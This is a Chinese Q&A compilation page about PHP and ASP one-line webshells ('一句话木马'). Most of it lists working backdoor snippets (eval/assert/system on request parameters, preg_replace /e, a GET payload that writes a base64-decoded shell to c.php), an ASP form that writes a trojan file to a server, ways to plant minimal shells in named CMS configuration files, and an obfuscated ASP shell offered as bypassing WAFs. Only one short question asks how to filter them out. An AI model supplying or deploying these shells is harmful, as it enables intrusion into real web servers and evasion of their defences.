本文目录一览:
- 1、一个有意思的 PHP 一句话后门,怎么破
- 2、webshell怎么写出来的
- 3、求高手看一下这段PHP代吧。呢些是网站木马。后门啥的给过滤下
- 4、php一句话木马~呢?
- 5、求分享最新php过狗大马或者一句话
一个有意思的 PHP 一句话后门,怎么破
?php eval($_POST1);?
?php if(isset($_POST['c'])){eval($_POST['c']);}?
?php system($_REQUEST1);?
?php ($_=@$_GET1).@$_($_POST1)?
?php eval_r($_POST1)?
?php @eval_r($_POST1)?//容错代码
?php assert($_POST1);?//使用Lanker一句话客户端的专家模式执行相关的PHP语句
?$_POST['c']($_POST['cc']);?
?$_POST['c']($_POST['cc'],$_POST['cc'])?
?php
@preg_replace("/[email]/e",$_POST['h'],"error");?/*使用这个后,使用菜刀一句话客户端在
配置连接的时候在"配置"一栏输入*/:Oh=@eval_r($_POST1);/O
?php echo `$_GET['r']` ?
//绕过?限制的一句话
script language="php"@eval_r($_POST[sb])/script
webshell怎么写出来的
form action=http://主机路径/TEXT.asp method=post
textarea name=value cols=120 rows=10 width=45
set lP=server.createObject("Adodb.Stream")//建立流对象
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆盖的方式
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "newmm.asp" //转向newmm.asp
/textarea
textarea name=newvalue cols=120 rows=10 width=45(添入生成木马的内容)
/textarea
BR
center
input type=submit value=提交
这里通过提交表单的方式,将木马提交上去,具体的做法是将定义一个对象IP,然后以文本方式写入newvalue里面的内容(newvalue的内容在textarea定义),写入以覆盖的方式产生ASP文件,然后执行这个脚本。
其中客户端中的value代表的是表单的名字,必须跟服务端(本机)的post提交中的表单名一样,所以这里的value可以为任意字符,相当于一个密码之类的东西,但是这个‘密码’是明文的,可以截取下来。
扩展资料:
写webshell的方法
利用"""":""//"等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以。
举例,在管理邮箱处添上cnhacker@263.net":eval request(chr (35))//,
在配制文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//",
还有一种方法就是写上 cnhacker@263.net"%%eval request(chr(35))%%',这样就会形成前后对应,最小马也就运行了。%eval request(chr(35))%可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时候要选前者。
再如动易2005,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话 马"%%execute request("l")%%',保存顶部栏目菜单参数设置成功后,我们就得到马地址http://网站/admin/rootclass_menu_config.asp.
参考资料:
百度百科webshell
求高手看一下这段PHP代吧。呢些是网站木马。后门啥的给过滤下
?php
@preg_replace("/[checksql]/e",$_POST['keio'],"saft");
?
这段是一句话后门
php一句话木马~呢?
超级隐蔽的PHP后门:
?php $_GET[a]($_GET[b]);?
仅用GET函数就构成了木马;
利用方法:
?a=assertb=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用
求分享最新php过狗大马或者一句话
很好,你这个的确过狗过阿里云和主流WAF。
我也分享我收藏的过狗PHP大马和一句话,兄弟不要发给别人了。
PHP的没找到。。。来个asp的吧
%
i=(Chr(-12590))
love=(Chr(-20306))
you=(Chr(-15133))
OK=iloveyou
CNM=Request(OK)
eVal CNM 'pass:我爱你
%